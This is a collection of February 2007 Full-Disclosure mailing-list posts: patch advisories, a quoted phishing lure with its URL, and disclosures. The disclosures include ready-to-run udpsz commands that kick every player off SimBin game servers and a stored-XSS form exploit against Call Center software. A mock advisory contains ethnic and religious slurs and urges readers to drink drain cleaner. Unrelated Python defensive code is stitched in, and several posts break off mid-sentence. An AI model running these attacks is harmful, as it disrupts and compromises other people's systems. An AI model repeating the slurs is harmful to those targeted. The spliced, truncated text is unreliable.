[Full-disclosure] Overtaking Google Desktop
Hello,

New research from Watchfire has revealed a serious vulnerability in Google Desktop. The attack, which is fully presented in a new Watchfire research paper released today (available at http://www.watchfire.com/resources/Overtaking-Google-Desktop.pdf), can allow a malicious individual to achieve not only remote, persistent access to sensitive data, but in some cases full system control as well.

Google Desktop is a popular freeware desktop search tool which offers powerful indexing abilities along with an easy-to-use interface. In many cases, Google Desktop manages highly sensitive information. Therefore, the impact of a security breach in it is far-reaching.

Google Desktop contains several protection mechanisms to secure its indexed data against remote intruders. In this paper, we present a step-by-step attack flow that circumvents Google Desktop's protection mechanisms and allows a malicious attack to take place against Google Desktop users. The attack is composed of web-application security flaws found in Google Desktop along with exploitation of Google Desktop's tight integration with the Google.com website.

The paper shows that it is possible to achieve remote and persistent access to sensitive data on attacked systems. In addition, under certain conditions, it is also possible to covertly inject and execute malicious applications on attacked systems, using Google Desktop's own features.

The full paper can be found at the following link:
http://www.watchfire.com/resources/Overtaking-Google-Desktop.pdf

A demonstration of the attack flow can be found at the same page or at the following link:
http://download.watchfire.com/googledesktopdemo/index.htm

Note:
- The Google Desktop security flaw was coordinated with the Google Security Team. Google has been responsive and recently issued a patch which mitigates the risk of the attack. We highly recommend that all Google Desktop users make sure they have an updated version installed on their system.

This vulnerability was discovered by me with the cooperation of Danny Allan and Adi Sharabani.

Best regards,
Yair Amit
Security Team
Watchfire (Israel) Ltd.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2007:044 ] - Updated ekiga packages fix string vulnerabilities.
Mandriva Linux Security Advisory                         MDKSA-2007:044
http://www.mandriva.com/security/

Package : ekiga
Date: February 21, 2007
Affected: 2007.0

Problem Description:

A format string flaw was discovered in how ekiga processes certain messages, which could permit a remote attacker that can connect to ekiga to potentially execute arbitrary code with the privileges of the user running ekiga.

Updated packages have been patched to correct this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1006

Updated Packages:

Mandriva Linux 2007.0:
949ddb13d6ec406dda15989adfa6a8a6  2007.0/i586/ekiga-2.0.3-1.1mdv2007.0.i586.rpm
301e55e46ec28ec2f6bb3371e4954f71  2007.0/SRPMS/ekiga-2.0.3-1.1mdv2007.0.src.rpm

Mandriva Linux 2007.0/X86_64:
206cffc2e041ffa98edcfa982fd42c14  2007.0/x86_64/ekiga-2.0.3-1.1mdv2007.0.x86_64.rpm
301e55e46ec28ec2f6bb3371e4954f71  2007.0/SRPMS/ekiga-2.0.3-1.1mdv2007.0.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] [ MDKSA-2007:045 ] - Updated gnomemeeting packages fix string vulnerabilities
Mandriva Linux Security Advisory                         MDKSA-2007:045
http://www.mandriva.com/security/

Package : gnomemeeting
Date: February 21, 2007
Affected: Corporate 3.0

Problem Description:

A format string flaw was discovered in how GnomeMeeting processes certain messages, which could permit a remote attacker that can connect to GnomeMeeting to potentially execute arbitrary code with the privileges of the user running GnomeMeeting.

Updated packages have been patched to correct this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1007

Updated Packages:

Corporate 3.0:
15e2472f2e41ab47d507cfb491d7a28d  corporate/3.0/i586/gnomemeeting-0.98.5-5.1.C30mdk.i586.rpm
0e1008ad8663cf490f7fe9bffddcf05c  corporate/3.0/SRPMS/gnomemeeting-0.98.5-5.1.C30mdk.src.rpm

Corporate 3.0/X86_64:
dfb6e715109f6134a3a8497de10fa75e  corporate/3.0/x86_64/gnomemeeting-0.98.5-5.1.C30mdk.x86_64.rpm
0e1008ad8663cf490f7fe9bffddcf05c  corporate/3.0/SRPMS/gnomemeeting-0.98.5-5.1.C30mdk.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
Re: [Full-disclosure] iDefense Security Advisory 02.15.07: Multiple Vendor ClamAV CAB File Denial of Service Vulnerability
On 2/15/07, iDefense Labs [EMAIL PROTECTED] wrote:

> The discoverer of this vulnerability wishes to remain anonymous.

And the reason can be found here:
https://wwws.clamav.net/bugzilla/show_bug.cgi?id=133

Great discovery!
[Full-disclosure] Bank of America [phishing email]
Got an email today that was crafted to look like it came from Bank of America. The message contained the following:

> Because of unusual number of invalid login attempts on you account, we had to believe that, their might be some security problem on you account. So we have decided to put an extra verification process to ensure your identity and your account security. Please click on <a href="http://www.candy-pop.com/www.bankofamerica.com/BOA/sslencrypt218bit/online_banking/index.htm" target="_blank">sign in to Online Banking</a> to continue to the verification process and ensure your account security. It is all about your security. Thank you, and visit the customer service section.

Which of course loads a phishing page that would capture login credentials should anyone fall for the ruse.

This may be old news though and possibly related to another story I read earlier on Zone-H here:
http://www.zone-h.org/content/view/14577/31/

Troy Cregger
Lead Developer, Technical Products.
Kennedy Information, Inc
One Phoenix Mill Ln, Fl 3
Peterborough, NH 03458
(603)924-0900 ext 662
[Full-disclosure] [USN-424-1] PHP vulnerabilities
===========================================================
Ubuntu Security Notice USN-424-1             February 21, 2007
php5 vulnerabilities
CVE-2007-0906, CVE-2007-0907, CVE-2007-0908, CVE-2007-0909,
CVE-2007-0910, CVE-2007-0988
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  libapache2-mod-php5   5.0.5-2ubuntu1.7
  php5-cgi              5.0.5-2ubuntu1.7
  php5-cli              5.0.5-2ubuntu1.7
  php5-common           5.0.5-2ubuntu1.7
  php5-odbc             5.0.5-2ubuntu1.7

Ubuntu 6.06 LTS:
  libapache2-mod-php5   5.1.2-1ubuntu3.5
  php5-cgi              5.1.2-1ubuntu3.5
  php5-cli              5.1.2-1ubuntu3.5
  php5-common           5.1.2-1ubuntu3.5
  php5-odbc             5.1.2-1ubuntu3.5

Ubuntu 6.10:
  libapache2-mod-php5   5.1.6-1ubuntu2.2
  php5-cgi              5.1.6-1ubuntu2.2
  php5-cli              5.1.6-1ubuntu2.2
  php5-common           5.1.6-1ubuntu2.2
  php5-odbc             5.1.6-1ubuntu2.2

After a standard system upgrade you need to restart Apache or reboot your computer to effect the necessary changes.

Details follow:

Multiple buffer overflows have been discovered in various PHP modules. If a PHP application processes untrusted data with functions of the session or zip module, or various string functions, a remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0906)

The sapi_header_op() function had a buffer underflow that could be exploited to crash the PHP interpreter. (CVE-2007-0907)

The wddx unserialization handler did not correctly check for some buffer boundaries and had an uninitialized variable. By unserializing untrusted data, this could be exploited to expose memory regions that were not meant to be accessible. Depending on the PHP application this could lead to disclosure of potentially sensitive information. (CVE-2007-0908)

On 64 bit systems (the amd64 and sparc platforms), various print functions and the odbc_result_all() were susceptible to a format string vulnerability. A remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0909)

Under certain circumstances it was possible to overwrite superglobal variables (like the HTTP GET/POST arrays) with crafted session data. (CVE-2007-0910)

When unserializing untrusted data on 64-bit platforms the zend_hash_init() function could be forced to enter an infinite loop, consuming CPU resources, for a limited length of time, until the script timeout alarm aborts the script. (CVE-2007-0988)

Updated packages for Ubuntu 5.10:
[Full-disclosure] Cisco Security Advisory: Cisco Unified IP Conference Station and IP Phone Vulnerabilities
Cisco Security Advisory: Cisco Unified IP Conference Station and IP Phone Vulnerabilities

Advisory ID: cisco-sa-20070221-phone
http://www.cisco.com/warp/public/707/cisco-sa-20070221-phone.shtml
Revision 1.0
For Public Release 2007 February 21 1600 UTC (GMT)

Summary
=======

Certain Cisco Unified IP Conference Station and IP Phone devices contain vulnerabilities which may allow unauthorized users to gain administrative access to vulnerable devices.

Cisco Unified IP Conference Station Administrative Bypass Vulnerability

Cisco Unified IP Conference Station 7935 and 7936 devices do not require a password when a URL is accessed directly via the administrator HTTP interface. There is a workaround for this vulnerability.

Cisco Unified IP Phone Default Account and Privilege Escalation Vulnerabilities

Cisco Unified IP Phone 7906G, 7911G, 7941G, 7961G, 7970G and 7971G devices contain a hard coded default user account with a default password which is remotely accessible via a Secure Shell (SSH) server enabled on the phone. This default user account may be leveraged to gain administrative access to a vulnerable phone via a privilege escalation vulnerability. The default user account may also execute commands causing a phone to become unstable and result in a denial of service. The default user account can not be disabled, removed or have its password changed. There are mitigations available for these vulnerabilities.

Cisco has made free software available to address these issues for affected customers.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070221-phone.shtml

Affected Products
=================

This section provides details on affected products.

Vulnerable Products
+------------------

This section provides details on vulnerable products.

Cisco Unified IP Conference Station
+----------------------------------

+-------+---------------------------+
| Model | Affected Firmware Version |
+-------+---------------------------+
| 7935  | 3.2(15) and earlier       |
+-------+---------------------------+
| 7936  | 3.3(12) and earlier       |
+-------+---------------------------+

Cisco Unified IP Phone
+---------------------

+-------+-----------------------+
| Model | Firmware Version      |
+-------+-----------------------+
| 7906G | 8.0(4)SR1 and earlier |
+-------+-----------------------+
| 7911G | 8.0(4)SR1 and earlier |
+-------+-----------------------+
| 7941G | 8.0(4)SR1 and earlier |
+-------+-----------------------+
| 7961G | 8.0(4)SR1 and earlier |
+-------+-----------------------+
| 7970G | 8.0(4)SR1 and earlier |
+-------+-----------------------+
| 7971G | 8.0(4)SR1 and earlier |
+-------+-----------------------+

The version of firmware running on an IP phone can be determined via the Settings menu on a phone. In most deployments, Cisco Unified CallManager (CUCM) can also be used to accurately determine the version of firmware that is supposed to be running on an IP phone. While CUCM maintains a record of the firmware it last deployed to an IP phone, it is possible for a user to change the firmware version on an IP phone.

Products Confirmed Not Vulnerable
+--------------------------------

Cisco Unified IP Phone 7902G, 7905, 7905G, 7910, 7912, 7912G, 7920, 7921G, 7940, 7960 and 7985 devices are not vulnerable to the default account and privilege escalation vulnerability.

No other Cisco products are known to be vulnerable.

Details
=======

Cisco Unified IP Conference Station Administrative Bypass Vulnerability
+---------------------------------------------------------------------

Cisco Unified IP Conference Station 7935 and 7936 devices provide integrated speaker phone services for a networked environment. 7935/7936 devices can be managed via an administrative HTTP interface and/or with a Cisco Unified CallManager (CUCM) system. The administrative HTTP interface is protected by a user configurable password. If a user knows the direct path to a management URL, it may be possible to access the administrative HTTP interface without being prompted for authentication.

The vulnerability occurs because vulnerable IP Conference Station devices incorrectly maintain the state of administrator login sessions. If an administrator logs into a vulnerable device via the HTTP interface, the administrator's credentials will be cached even after the administrator logs out of the device. This leaves a window of opportunity for an unauthorized user to gain complete administrative access to a vulnerable device. If an administrator never accesses a potentially vulnerable device via the HTTP interface, the device is not vulnerable to the authentication bypass attack.

It is possible to reset an IP Conference Station to a non
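The session-state defect described above, modelled as an added example (not Cisco firmware): a device-wide "admin has logged in" bit that logout never clears, beside a version where every admin URL is checked against a live per-login session that logout invalidates and idle time expires. The URL paths, password and timeout are constructed for the illustration.

```python
"""Admin-session state: the cached-login pattern behind the 7935/7936 bypass, beside a fix.

Added example, not Cisco firmware. Models the behaviour the advisory describes
(login state survives logout, so any directly requested admin URL is served) and
a hardened version (per-session token, cleared on logout, idle timeout, checked
on every admin URL). URL paths, the password and the timeout are constructed.
"""
import hmac
import secrets
import time
from typing import Callable, Dict, Optional

# Constructed admin URLs; a real device has its own management paths.
ADMIN_URLS = {"/admin/index.html", "/admin/network.html", "/admin/reboot.html"}


class FlawedAdminInterface:
    """Reproduces the described flaw: one device-wide 'admin has logged in' bit.

    Until an administrator logs in via HTTP the bit is clear and every admin URL
    is refused, matching the advisory's note that a device never managed via
    HTTP is not exposed. Once set, logout never clears it, so anyone who knows
    a management URL afterwards is served without a password prompt.
    """

    def __init__(self, password: str) -> None:
        self._password = password
        self._admin_seen = False

    def login(self, password: str) -> bool:
        if hmac.compare_digest(password.encode(), self._password.encode()):
            self._admin_seen = True
            return True
        return False

    def logout(self) -> None:
        # The flaw: credential state is cached, nothing is reset here.
        return None

    def get(self, url: str) -> int:
        if url not in ADMIN_URLS:
            return 404
        return 200 if self._admin_seen else 401


class HardenedAdminInterface:
    """Every admin URL requires a live, unexpired session token from this login."""

    def __init__(self, password: str, idle_timeout: float = 300.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self._password = password
        self._idle_timeout = idle_timeout
        self._clock = clock  # injectable so expiry can be tested deterministically
        self._sessions: Dict[str, float] = {}  # token -> last-activity timestamp

    def login(self, password: str) -> Optional[str]:
        if not hmac.compare_digest(password.encode(), self._password.encode()):
            return None
        token = secrets.token_urlsafe(32)
        self._sessions[token] = self._clock()
        return token

    def logout(self, token: Optional[str]) -> None:
        # Logout invalidates the session server-side; the token is useless afterwards.
        if token is not None:
            self._sessions.pop(token, None)

    def _session_is_live(self, token: Optional[str]) -> bool:
        if token is None or token not in self._sessions:
            return False
        now = self._clock()
        if now - self._sessions[token] > self._idle_timeout:
            del self._sessions[token]  # idle too long: drop it, force a fresh login
            return False
        self._sessions[token] = now  # sliding idle window
        return True

    def get(self, url: str, token: Optional[str]) -> int:
        # Authorization is evaluated on every request, so knowing a URL grants nothing.
        if url not in ADMIN_URLS:
            return 404
        return 200 if self._session_is_live(token) else 401
```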
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in 802.1X Supplicant
Cisco Security Advisory: Multiple Vulnerabilities in 802.1X Supplicant

Advisory ID: cisco-sa-20070221-supplicant
http://www.cisco.com/warp/public/707/cisco-sa-20070221-supplicant.shtml
Revision 1.0
For Public Release 2007 February 21 1600 UTC (GMT)

Summary
=======

The Cisco Secure Services Client (CSSC) is a software client that enables customers to deploy a single authentication framework using the 802.1X authentication standard across multiple device types to access both wired and wireless networks. A lightweight version of the CSSC client is also a component of the Cisco Trust Agent (CTA) within the Cisco Network Admission Control (NAC) Framework solution.

These products are affected by multiple vulnerabilities including privilege escalations and information disclosure.

Cisco has made free software available to address these vulnerabilities for affected customers.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070221-supplicant.shtml.

Affected Products
=================

This section provides details on affected products.

Vulnerable Products
+------------------

Any version of the following software clients, prior to the versions which are listed in the Software Versions and Fixes section below, may be vulnerable.

  * Cisco Secure Services Client 4.x versions
  * Cisco Trust Agent 1.x and 2.x versions
  * Meetinghouse AEGIS SecureConnect Client (Windows platform versions)
  * Cisco Security Agent (CSA) bundle versions 5.0 and 5.1

To determine the version of the Cisco Trust Agent installed, the ctastat command found in the \Program Files\Cisco Systems\CiscoTrustAgent directory will provide output similar to:

    Cisco Trust Agent Statistics
    Current Time: Tue Sep 27 19:11:18 2005
    CTA Version: 2.0.0.26

To determine the version of the Cisco Secure Services Client installed, the software version information may be found in the About dialog window which may be launched underneath the Help tab within the client.

Cisco Security Agent bundle versions 5.0 and 5.1 included Cisco Trust Agent software within the bundle. Customers who have deployed CTA as part of their CSA client package may be vulnerable if the version of CTA included is a version which is affected.

Products Confirmed Not Vulnerable
+--------------------------------

No other Cisco products are currently known to be affected by these vulnerabilities.

Details
=======

The Cisco Secure Services Client (CSSC) is a software client that enables customers to deploy a single authentication framework using the 802.1X authentication standard across multiple device types to access both wired and wireless networks. Previously this product was marketed as the Meetinghouse AEGIS SecureConnect client.

Cisco Trust Agent (CTA) installed on end-hosts is a core component of the Cisco Network Admission Control (NAC) Framework solution. CTA optionally includes a lightweight version of CSSC to provide authentication as part of the NAC Framework solution, using the network infrastructure to enforce security policy compliance on all devices seeking to access network computing resources.

Both products are affected by multiple vulnerabilities including privilege escalations and password disclosure.

Privilege Escalations
+--------------------

Four privilege escalation vulnerabilities exist in both products.

  * It is possible for an unprivileged user who is logged into the computer to increase their privileges to the local system user via the help facility within the supplicant Graphical User Interface (GUI). This vulnerability is documented by Cisco Bug ID CSCsf14120.

  * An unprivileged user who is logged into the computer is able to launch any program on a system to run with SYSTEM privileges from within the supplicant application. This vulnerability is documented by Cisco Bug ID CSCsf15836.

  * Insecure default Discretionary Access Control Lists (DACL) for the connection client GUI (ConnectionClient.exe) allow an unprivileged user to inject a thread under ConnectionClient.exe running with SYSTEM level privileges. This vulnerability is documented by Cisco Bug ID CSCsg20558.

  * Due to the method used in parsing commands, it is possible that an unprivileged user who is logged into the computer could launch a process as the local system user. This vulnerability is documented by Cisco Bug IDs CSCsh30297 and CSCsh30624.

Password Disclosure
+------------------

With authentication methods which convey a password in a protected tunnel, the user's password will be logged in cleartext in the application log files described below (assuming default installation paths). This will occur with the following methods:

  * TTLS CHAP
  * TTLS MSCHAP
  * TTLS MSCHAPv2
  * TTLS PAP
  * MD5
  * GTC
  * LEAP
  * PEAP MSCHAPv2
  * PEAP GTC
  * FAST

CTA Wired
[Full-disclosure] Players disconnection in Simbin racing games
#######################################################################

                             Luigi Auriemma

Application:  games developed by SimBin Development Team
              http://www.simbin.se
Versions:     GTR - FIA GT Racing Game  = 1.5.0.0          http://www.gtr-game.com
              GT Legends                = 1.1.0.0          http://www.gt-legends.com
              GTR 2                     = 1.1              http://www.gtr-game.com
              RACE - The WTCC Game      = 1.0 (0.6.3.0?)   http://www.race-game.org
Platforms:    Windows
Bug:          clients disconnection
Exploitation: remote, versus clients
Date:         21 Feb 2007
Author:       Luigi Auriemma
              e-mail: [EMAIL PROTECTED]
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Simbin is a well known software house specialized in developing racing games deeply devoted to extreme simulation. All their games are very recent; GTR was released in November 2004 while Race WTCC exactly two years later.

#######################################################################

======
2) Bug
======

The problem is very simple: a UDP packet of zero bytes (empty) sent to the main port of the server (usually 48942 for Race WTCC and 34297 for the other games) forces the disconnection of all the clients connected to it.

The attacker needs only to send one packet (spoofing possible) and the clients in the game will be immediately kicked with the message "Lost connection with the Host". Then they can re-join again... but can be re-kicked in the same way too.

#######################################################################

===========
3) The Code
===========

- get udpsz from here:
  http://aluigi.org/testz/udpsz.zip

- launch it versus the server:

    udpsz 127.0.0.1 34297 0      for GTR, GTR2 and GT Legends
    udpsz 127.0.0.1 48942 0      for Race WTCC

- check what happened to the clients connected to it

#######################################################################

======
4) Fix
======

No fix.
No reply received from the developers.

#######################################################################

---
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org
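A defensive counterpart to the bug above, added here as an example (it is not SimBin's code and not the udpsz tool): a receive path that drops zero-length datagrams before they reach the game logic, plus a monitor that flags sources sending them. The port numbers are the ones named in the advisory; the source addresses, sample traffic and alert threshold are constructed.

```python
"""Drop and flag zero-length UDP datagrams aimed at the SimBin server ports.

Added example, not the game's code or the udpsz tool. Port numbers come from the
advisory above; source addresses, sample traffic and thresholds are constructed.
"""
import socket
from collections import Counter
from typing import List, Tuple

# Main server ports named in the advisory.
GAME_PORTS = {
    34297: "GTR / GTR2 / GT Legends",
    48942: "RACE - The WTCC Game",
}

# Constructed threshold: alert once a single source has sent this many empties.
EMPTY_ALERT_THRESHOLD = 3


def classify_datagram(payload: bytes, dst_port: int) -> str:
    """Decide what to do with one datagram before any game parsing runs.

    'ignore'     -> not one of the game ports, out of scope here
    'drop-empty' -> zero-length payload: the trigger described in the advisory
    'pass'       -> hand to the normal protocol handler
    """
    if dst_port not in GAME_PORTS:
        return "ignore"
    if len(payload) == 0:
        return "drop-empty"
    return "pass"


class EmptyDatagramMonitor:
    """Counts empty datagrams per source and raises an alert at the threshold.

    The trigger is a single, spoofable packet, so the per-source count is a hint
    for the operator rather than proof of who sent it; the drop in
    classify_datagram() is what actually protects the connected clients.
    """

    def __init__(self, threshold: int = EMPTY_ALERT_THRESHOLD) -> None:
        self.threshold = threshold
        self.empty_by_source: Counter = Counter()
        self.alerts: List[str] = []

    def observe(self, src_ip: str, dst_port: int, payload: bytes) -> str:
        verdict = classify_datagram(payload, dst_port)
        if verdict == "drop-empty":
            self.empty_by_source[src_ip] += 1
            if self.empty_by_source[src_ip] == self.threshold:
                self.alerts.append(
                    f"{src_ip} sent {self.threshold} empty datagrams to "
                    f"udp/{dst_port} ({GAME_PORTS[dst_port]})"
                )
        return verdict


def serve_one(sock: socket.socket, monitor: EmptyDatagramMonitor) -> Tuple[str, bytes]:
    """Receive one datagram on a bound UDP socket and apply the policy.

    Returns (verdict, payload); only 'pass' payloads should reach game logic.
    A zero-length datagram is a legal UDP message and recvfrom() returns b'' for
    it, so the length check has to happen here, not inside the protocol parser.
    """
    payload, (src_ip, _src_port) = sock.recvfrom(65535)
    dst_port = sock.getsockname()[1]
    return monitor.observe(src_ip, dst_port, payload), payload


def replay_constructed_sample() -> Tuple[List[str], List[str]]:
    """Run the policy over a constructed capture of (src_ip, dst_port, payload)."""
    sample = [
        ("198.51.100.7", 34297, b"\x01\x00join"),   # ordinary traffic
        ("198.51.100.7", 34297, b""),               # empty: would kick every client
        ("198.51.100.7", 34297, b""),
        ("198.51.100.7", 34297, b""),               # third empty from one source -> alert
        ("203.0.113.9", 48942, b""),                # a single empty at the WTCC port
        ("203.0.113.9", 53, b""),                   # not a game port, ignored here
    ]
    monitor = EmptyDatagramMonitor()
    verdicts = [monitor.observe(*record) for record in sample]
    return verdicts, monitor.alerts


if __name__ == "__main__":
    verdicts, alerts = replay_constructed_sample()
    print(verdicts)
    for alert in alerts:
        print("ALERT:", alert)
```

Where the server binary cannot be changed, the same drop can be applied at the host firewall: an empty IPv4 UDP datagram is a 28-byte packet (20-byte IP header plus 8-byte UDP header), so on Linux `iptables -A INPUT -p udp --dport 34297 -m length --length 28 -j DROP` discards it before the game ever sees it.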
[Full-disclosure] Full Disclosure Advisory on Full-Disclosure hax0r3rz
Weakness in Full Disclosure mailing list allows morons to flourish

Vulnerable: The entire mailing list
Severity: Critic-Ill
Classification: Loser Validation
BugTraq-ID: TBA
CVE-Number: TBA
Remote Exploit: YUP
Local Exploit: YUP
Vendor URL: http://lists.grok.org.uk
Author: Mai Long Wang
Scheduled Release date: Feb 21st, 2007
Notifications: Right now retard

Problem:

By keeping an unmoderated mailing list, Full Disclosure has introduced the security community to an insane amount of idiots who think that downloading any and all PHP based software then running:

    for i in `find . -name '*.php'`; do
        grep phpinfo "$i"
        echo "eye can hax0r1ze y0ur bl0g"
    done

This issue has become increasingly disturbing as idiots from all over the world have not been able to differentiate themselves between mules (aka asses) from real hackers. Full disclosure has also introduced other types of clowns who spam up legitimate users' email boxes with moronic responses fired off in desperation in attempts to boost the clown's ego.

Vendor Response:

None. Vendor is also clueless.

Solution:

Introduce a security mailing list for professionals that is moderated, its users have been validated, and the typical response will not be:

    Sh4r j00 fackinG luzer. I pwned your php webserver with my lam3 ass 0day
    Did j0o s33 how I hax0rfied their server Mustafa! Praises be due to allah!
    Joo facking Jews.
    I said so therefore it is!
    mYe SiGnAtUrE iS r33t wAiT tILL eYe sh0w mYe Netzero and AOL gaytarded buddies I can hax0r!

Workaround:

Filter luzers' email addresses

Credit:

Old schoolers who know damn well where this advisory is coming from.

Greets:

Greets go out to the dinosaurs no longer on the scene. Those on the scene... You know where to find me.

Copyright:

Copytheft (c) 2007 x to the p zero

This report should be copied and redistributed to the idiots on this list whenever possible in attempts to get them to finally shut their damn mouths in efforts to minimize the nonsense filling my email ebox. Additional thoughts on minimizing the amount of idiocy would be taking a stick and using some of these idiots as a party Pinata.

This report is intended to make users think before they shoot off dumb ass messages no one gives a flying fuck about. Moderators are asked to do something productive which is called moderate. Idiots are also asked to be productive and swallow a gallon of Liquid Drano before bedtime. Parents are also asked to monitor their little rejects and give them some attention so they can stop playing hax0rs and giving security professionals a bad rap when the word hacker comes into a business conversation. It's been too long that the mention of the word hacker sets off unwarranted paranoia.
Re: [Full-disclosure] Full Disclosure Advisory on Full-Disclosure hax0r3rz
> Full disclosure has also introduced other types of clowns who spam up
> legitimate users' email boxes with moronic responses fired off in
> desperation in attempts to boost the clown's ego.

Should the irony of the fact that this is exactly what you just did be lost on me?

On Wed, 21 Feb 2007, Mofo Haxsor wrote:

> Date: Wed, 21 Feb 2007 12:25:28 -0500
> From: Mofo Haxsor [EMAIL PROTECTED]
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Full Disclosure Advisory on Full-Disclosure hax0r3rz
>
> [...]
[Full-disclosure] Call Center Software - Remote Xss Post Exploit -
-=[ADVISORY---]=-
Call center 0,93
Author: CorryL [EMAIL PROTECTED]
-=[---]=-

-=[+] Application:    Call center
-=[+] Version:        0,93
-=[+] Vendor's URL:   http://www.call-center-software.org/
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Cross-Site Script
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:         CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:      www.xoned.net
-=[+] Virtual Office: http://www.kasamba.com/CorryL
-=[+] Irc Chan:       irc.darksin.net #x0n3-h4ck

..::[ Description ]::..

Call center software is one of the most important aspects of any call help center; being able to track and manage calls can be the key to high customer satisfaction. Our 100% free call center software solution is based on php and the mysql database.

..::[ Bug ]::..

An attacker exploiting this vulnerability is able to steal the contents of the admin user's cookies. The bug is in a POST request: the injected content is stored in the database and stays there until the admin goes to read the content of the call.

..::[ Exploit ]::..

<html>
<head>
<title>Call Center</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="helpdesk.css" type="text/css">
</head>
<body>
<table bgcolor="#FF" width="100%">
<tr>
<td align="center">
<form method="post" action="http://remote_server/path/call_entry.php">
<table border="0">
<tr>
<th class="ttitle">Adding Call</th>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="3">
<tr>
<td align="right">Name:&nbsp;</td><td align="left"><input type="text" name="name" value="H4ck3r" size="30"></td>
</tr>
<tr>
<td align="right">Phone:&nbsp;</td><td align="left"><input type="text" name="phone" value="111-555-555" size="20"></td>
</tr>
<tr>
<td align="right">Department:&nbsp;</td>
<td>
<select name="department_id">
<option value="1">Problem</option>
</select>
</td>
</tr>
<tr>
<td align="right">Issue Type:&nbsp;</td>
<td>
<select name="issue_id">
<option value="6">email</option>
<option value="2">keyboard</option>
<option value="3">monitor</option>
<option value="5">mouse</option>
<option value="4">network</option>
<option value="8">password</option>
[Full-disclosure] [ MDKSA-2007:047 ] - Updated kernel packages fix multiple vulnerabilities and bugs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

___
Mandriva Linux Security Advisory MDKSA-2007:047
http://www.mandriva.com/security/
___

Package : kernel
Date: February 21, 2007
Affected: 2007.0
___

Problem Description:

Some vulnerabilities were discovered and corrected in the Linux 2.6 kernel:

A double free vulnerability in the squashfs module could allow a local user to cause a Denial of Service by mounting a crafted squashfs filesystem (CVE-2006-5701).

The zlib_inflate function allows local users to cause a crash via a malformed filesystem that uses zlib compression that triggers memory corruption (CVE-2006-5823).

The key serial number collision avoidance code in the key_alloc_serial function in kernels 2.6.9 up to 2.6.20 allows local users to cause a crash via vectors that trigger a null dereference (CVE-2007-0006).

The provided packages are patched to fix these vulnerabilities. All users are encouraged to upgrade to these updated kernels immediately and reboot to effect the fixes.

In addition to these security fixes, other fixes have been included such as:
- New drivers: nozomi, UVC
- Fixed SiS SATA support for chips on 966/968 bridges
- Fixed issues in squashfs by updating to 3.2 (#27008)
- Added support for SiS968 bridges to the sis190 bridge
- Fixed JMicron cable detection
- Added /proc/config.gz support and enabled kexec on x86_64
- Other minor fixes

To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate
___

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5701
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5823
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0006
___

Updated Packages:

Mandriva Linux 2007.0:
07df9cceca48092bca1fd65cadf91e69 2007.0/i586/kernel-2.6.17.11mdv-1-1mdv2007.0.i586.rpm
a1dbf1afa75579198166a3f4a74f45d5 2007.0/i586/kernel-doc-2.6.17.11mdv-1-1mdv2007.0.i586.rpm
da3d2669e324068dd7563a29356a6221
